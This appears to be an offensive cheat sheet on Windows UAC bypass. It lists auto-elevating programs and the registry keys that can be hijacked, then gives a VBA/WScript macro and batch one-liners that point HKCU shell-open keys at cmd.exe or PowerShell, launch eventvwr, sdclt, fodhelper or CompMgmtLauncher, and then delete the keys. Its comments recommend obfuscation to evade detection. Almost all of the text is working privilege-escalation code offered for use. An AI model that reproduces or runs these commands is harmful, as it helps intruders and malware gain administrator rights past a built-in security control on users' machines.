UAC Bypass #
Vulnerable programs #
CompMgmtLauncher.exe
#
eventvwr.exe
#
- Windows 7/8/10
HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command
="cmd.exe"
sdclt.exe
#
- Windows 10
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe
="cmd.exe"
fodhelper.exe
#
- Windows 10
HKCU\Software\Classes\ms-settings\shell\open\command
="DelegateExecute"
HKCU\Software\Classes\ms-settings\shell\open\command
="cmd.exe"
Examples #
WScript Example
' Credits to https://gist.github.com/dxflatline/6e399ea1fef59456d7ed82909f3bd506
' Sleep is caught (may use ping instead?)
' Obfusc may be needed
Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
Private Sub CommandButton1_Click()
Set WSobj = CreateObject("WScript.Shell")
WSobj.RegWrite "HKCU\Software\Classes\mscfile\shell\open\command\", ""
WSobj.RegWrite "HKCU\Software\Classes\mscfile\shell\open\command\", "C:\windows\system32\cmd.exe", "REG_SZ"
WSobj.Run ("C:\Windows\System32\eventvwr.exe")
Sleep 2000
WSobj.RegDelete "HKCU\Software\Classes\mscfile\shell\open\command\"
WSobj.RegDelete "HKCU\Software\Classes\mscfile\shell\open\"
WSobj.RegDelete "HKCU\Software\Classes\mscfile\shell\"
WSobj.RegDelete "HKCU\Software\Classes\mscfile\"
End Sub
Source: uac-bypass.vbs
Batch Example
REM Credits to https://gist.github.com/xillwillx/39e5cccc846d5b5a475bbad48216a5a7
**UAC bypass for Win10:**
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /d "cmd.exe" /f && START /W sdclt.exe && reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /f
**UAC bypass for Win10:**
reg add HKCU\Software\Classes\ms-settings\shell\open\command /v "DelegateExecute" /f && reg add HKCU\Software\Classes\ms-settings\shell\open\command /d "cmd /c start powershell.exe" /f && START /W fodhelper.exe && reg delete HKCU\Software\Classes\ms-settings /f
**UAC bypass for 7/8/10:**
reg add HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command /d "cmd.exe" /f && START /W CompMgmtLauncher.exe && reg delete HKEY_CURRENT_USER\Software\Classes\mscfile /f
Source: uac-bypass.bat